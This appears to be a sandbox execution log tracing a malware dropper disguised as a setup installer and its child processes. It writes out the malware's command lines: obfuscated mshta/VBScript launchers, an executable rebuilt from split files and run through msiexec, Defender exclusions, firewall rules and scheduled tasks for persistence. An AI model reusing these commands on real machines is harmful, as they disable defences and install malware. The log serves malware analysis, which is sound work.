C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r EchO | SEt /P = "MZ" > OoZ39QP7.Q~P & cOPy /Y /b OOZ39QP7.q~P + 3_PI.f2x + 6TWz8s9B.~T +TiRWH.Ql + FFUU.A1 + YZA~WMAU.H + FDHTx.pBB + V16YA.kU ..\WGKZNZ9t.jOX & StArT msiexec.exe -y ..\WgKZNZ9T.JOX & deL /Q *7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EchO "8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>OoZ39QP7.Q~P"8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /Im "FhLKl5cj19hUvdWkcqQyDNUv.exe" -f5⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\7AQ5wKvZuy4mxjyIRh_1ITjV.exe"C:\Users\Admin\Pictures\Adobe Films\7AQ5wKvZuy4mxjyIRh_1ITjV.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\7AQ5wKvZuy4mxjyIRh_1ITjV.exe"C:\Users\Admin\Pictures\Adobe Films\7AQ5wKvZuy4mxjyIRh_1ITjV.exe"3⤵
-
C:\Users\Admin\Pictures\Adobe Films\dHTl_RtE2hNmhOES7j1a4rLs.exe"C:\Users\Admin\Pictures\Adobe Films\dHTl_RtE2hNmhOES7j1a4rLs.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=13⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--XpjC5"4⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x20c,0x210,0x214,0x1e8,0x218,0x7fffa0d2dec0,0x7fffa0d2ded0,0x7fffa0d2dee05⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x134,0x138,0x13c,0x11c,0x140,0x7ff76a419e70,0x7ff76a419e80,0x7ff76a419e906⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1932,6801195554332470735,10517743425130808527,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5996_1410783684" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --mojo-platform-channel-handle=2452 /prefetch:15⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1932,6801195554332470735,10517743425130808527,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5996_1410783684" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --mojo-platform-channel-handle=2432 /prefetch:15⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1932,6801195554332470735,10517743425130808527,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5996_1410783684" --mojo-platform-channel-handle=2004 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1932,6801195554332470735,10517743425130808527,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5996_1410783684" --mojo-platform-channel-handle=1992 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1932,6801195554332470735,10517743425130808527,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5996_1410783684" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1944 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1932,6801195554332470735,10517743425130808527,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5996_1410783684" --mojo-platform-channel-handle=3240 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1932,6801195554332470735,10517743425130808527,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5996_1410783684" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3364 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1932,6801195554332470735,10517743425130808527,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5996_1410783684" --mojo-platform-channel-handle=3480 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1932,6801195554332470735,10517743425130808527,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5996_1410783684" --mojo-platform-channel-handle=3848 /prefetch:85⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1932,6801195554332470735,10517743425130808527,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5996_1410783684" --mojo-platform-channel-handle=3856 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1932,6801195554332470735,10517743425130808527,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5996_1410783684" --mojo-platform-channel-handle=3524 /prefetch:85⤵
-
C:\Users\Admin\Desktop\setup_x86_x64_install.exe"C:\Users\Admin\Desktop\setup_x86_x64_install.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue130c270d23c79.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue130c270d23c79.exeTue130c270d23c79.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 4926⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Drops file in Windows directory
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue13c1be0d8f62bc.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13c1be0d8f62bc.exeTue13c1be0d8f62bc.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue13d68628efddb1.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13d68628efddb1.exeTue13d68628efddb1.exe5⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\pozVUN853DbpIySIENQjkgyZ.exe"C:\Users\Admin\Pictures\Adobe Films\pozVUN853DbpIySIENQjkgyZ.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\Gn5frZPIHvGjfBwF7Il2mnlk.exe"C:\Users\Admin\Pictures\Adobe Films\Gn5frZPIHvGjfBwF7Il2mnlk.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\uf2t2oDZV5LRLSSN6Hb8voFZ.exe"C:\Users\Admin\Pictures\Adobe Films\uf2t2oDZV5LRLSSN6Hb8voFZ.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\c1dNg7rmL7AM4CiqKD1oZyCX.exe"C:\Users\Admin\Pictures\Adobe Films\c1dNg7rmL7AM4CiqKD1oZyCX.exe"6⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\cRacS9rhR__TiismTflL68cH.exe"C:\Users\Admin\Documents\cRacS9rhR__TiismTflL68cH.exe"7⤵
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\IZmycoJU1BUvsJtg9jpdpmxM.exe"C:\Users\Admin\Pictures\Adobe Films\IZmycoJU1BUvsJtg9jpdpmxM.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\4f_pj1ZUCcQZBGvlSheBYq7p.exe"C:\Users\Admin\Pictures\Adobe Films\4f_pj1ZUCcQZBGvlSheBYq7p.exe"8⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\W6dQhnol2X1JHQB0qLL6rcXv.exe"C:\Users\Admin\Pictures\Adobe Films\W6dQhnol2X1JHQB0qLL6rcXv.exe"8⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 8012 -s 15169⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\dwy8rW6Lldk0o1PoYRnRbG17.exe"C:\Users\Admin\Pictures\Adobe Films\dwy8rW6Lldk0o1PoYRnRbG17.exe"8⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\QheMslevAL_rz9xfz1g6Ru3F.exe"C:\Users\Admin\Pictures\Adobe Films\QheMslevAL_rz9xfz1g6Ru3F.exe" /mixtwo8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "QheMslevAL_rz9xfz1g6Ru3F.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\QheMslevAL_rz9xfz1g6Ru3F.exe" & exit9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "QheMslevAL_rz9xfz1g6Ru3F.exe" /f10⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\6oTvJ3igZwucenJM0iuuyi70.exe"C:\Users\Admin\Pictures\Adobe Films\6oTvJ3igZwucenJM0iuuyi70.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-MCSO9.tmp\6oTvJ3igZwucenJM0iuuyi70.tmp"C:\Users\Admin\AppData\Local\Temp\is-MCSO9.tmp\6oTvJ3igZwucenJM0iuuyi70.tmp" /SL5="$60700,506127,422400,C:\Users\Admin\Pictures\Adobe Films\6oTvJ3igZwucenJM0iuuyi70.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-EF7EV.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-EF7EV.tmp\ShareFolder.exe" /S /UID=270910⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Google\HKGZKXCOFY\foldershare.exe"C:\Program Files\Google\HKGZKXCOFY\foldershare.exe" /VERYSILENT11⤵
-
C:\Users\Admin\AppData\Local\Temp\23-0f575-dac-7c5bc-ff87eda10eba9\SHomaegedaetu.exe"C:\Users\Admin\AppData\Local\Temp\23-0f575-dac-7c5bc-ff87eda10eba9\SHomaegedaetu.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\88-a8f9a-aaa-7b9ae-4f474297c539c\Relycucuka.exe"C:\Users\Admin\AppData\Local\Temp\88-a8f9a-aaa-7b9ae-4f474297c539c\Relycucuka.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m3ufui1n.mwt\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\m3ufui1n.mwt\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\m3ufui1n.mwt\GcleanerEU.exe /eufive13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fteiij3d.z0t\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\fteiij3d.z0t\installer.exeC:\Users\Admin\AppData\Local\Temp\fteiij3d.z0t\installer.exe /qn CAMPAIGN="654"13⤵
- Modifies system certificate store
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s3jkvabz.u3f\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\s3jkvabz.u3f\any.exeC:\Users\Admin\AppData\Local\Temp\s3jkvabz.u3f\any.exe13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c01bmoqz.111\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\c01bmoqz.111\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\c01bmoqz.111\gcleaner.exe /mixfive13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gnnb0mnc.upl\autosubplayer.exe /S & exit12⤵
-
C:\Users\Admin\Pictures\Adobe Films\6nnsooN3RPWOeznJdYnBPSbg.exe"C:\Users\Admin\Pictures\Adobe Films\6nnsooN3RPWOeznJdYnBPSbg.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
-
C:\Users\Admin\Pictures\Adobe Films\xhH0CSaNzTzyIUn8cKJRVTBQ.exe"C:\Users\Admin\Pictures\Adobe Films\xhH0CSaNzTzyIUn8cKJRVTBQ.exe"8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\I2Ef1Cm7naRGD7NIonKfSNUO.exe"C:\Users\Admin\Pictures\Adobe Films\I2Ef1Cm7naRGD7NIonKfSNUO.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\TGtAEWLljVxWkvq1xb8Zi2ek.exe"C:\Users\Admin\Pictures\Adobe Films\TGtAEWLljVxWkvq1xb8Zi2ek.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\h7pNaKg1Ramme0ohTtFbfQ3J.exe"C:\Users\Admin\Pictures\Adobe Films\h7pNaKg1Ramme0ohTtFbfQ3J.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue132b1547125d9.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue132b1547125d9.exeTue132b1547125d9.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue13bbed6e0bb6.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13bbed6e0bb6.exeTue13bbed6e0bb6.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRIpt: CloSE ( CReaTeOBJEcT ( "WscRiPT.SHEll" ). rUn ( "C:\Windows\system32\cmd.exe /r tyPe ""C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13bbed6e0bb6.exe"" > 7DLAd.ExE && start 7DLAd.exE /pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo & if """" == """" for %v In ( ""C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13bbed6e0bb6.exe"" ) do taskkill -iM ""%~nXv"" /F " , 0, truE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /r tyPe "C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13bbed6e0bb6.exe" > 7DLAd.ExE && start 7DLAd.exE /pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo & if "" == "" for %v In ( "C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13bbed6e0bb6.exe" ) do taskkill -iM "%~nXv" /F7⤵
-
C:\Users\Admin\AppData\Local\Temp\7DLAd.ExE7DLAd.exE /pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCRIpt: CloSE ( CReaTeOBJEcT ( "WscRiPT.SHEll" ). rUn ( "C:\Windows\system32\cmd.exe /r tyPe ""C:\Users\Admin\AppData\Local\Temp\7DLAd.ExE"" > 7DLAd.ExE && start 7DLAd.exE /pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo & if ""/pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo "" == """" for %v In ( ""C:\Users\Admin\AppData\Local\Temp\7DLAd.ExE"" ) do taskkill -iM ""%~nXv"" /F " , 0, truE ) )9⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /r tyPe "C:\Users\Admin\AppData\Local\Temp\7DLAd.ExE" > 7DLAd.ExE && start 7DLAd.exE /pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo & if "/pQoSkdkR0zB4x3ysnvq6jrFRpAvzHo " == "" for %v In ( "C:\Users\Admin\AppData\Local\Temp\7DLAd.ExE" ) do taskkill -iM "%~nXv" /F10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIpT: clOsE ( CReaTeobJecT ( "wscRIPT.sHELl" ). ruN ( "CmD /q /r Echo | set /p = ""MZ"" > jo4H.q&COPy /B /Y JO4H.Q + XnY7kB~A.WCr +487fXM.V + CHBTE0X.Zm + oD_N_P5.BfY LeJ9.uX & stArT msiexec.exe /y .\LEJ9.uX " , 0 , TRue ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /r Echo | set /p = "MZ" > jo4H.q&COPy /B /Y JO4H.Q + XnY7kB~A.WCr +487fXM.V + CHBTE0X.Zm + oD_N_P5.BfY LeJ9.uX & stArT msiexec.exe /y .\LEJ9.uX10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Echo "11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>jo4H.q"11⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /y .\LEJ9.uX11⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "Tue13bbed6e0bb6.exe" /F8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue13a47d89c50.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13a47d89c50.exeTue13a47d89c50.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4432 -s 14246⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue13530584f2459af.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13530584f2459af.exeTue13530584f2459af.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13530584f2459af.exeC:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13530584f2459af.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13530584f2459af.exeC:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13530584f2459af.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13530584f2459af.exeC:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13530584f2459af.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue13a98da3f882e5.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13a98da3f882e5.exeTue13a98da3f882e5.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue136037e6ffe49ce8.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue136037e6ffe49ce8.exeTue136037e6ffe49ce8.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-NDF39.tmp\Tue136037e6ffe49ce8.tmp"C:\Users\Admin\AppData\Local\Temp\is-NDF39.tmp\Tue136037e6ffe49ce8.tmp" /SL5="$202F4,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue136037e6ffe49ce8.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue136037e6ffe49ce8.exe"C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue136037e6ffe49ce8.exe" /SILENT7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-L0DGN.tmp\Tue136037e6ffe49ce8.tmp"C:\Users\Admin\AppData\Local\Temp\is-L0DGN.tmp\Tue136037e6ffe49ce8.tmp" /SL5="$20358,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue136037e6ffe49ce8.exe" /SILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
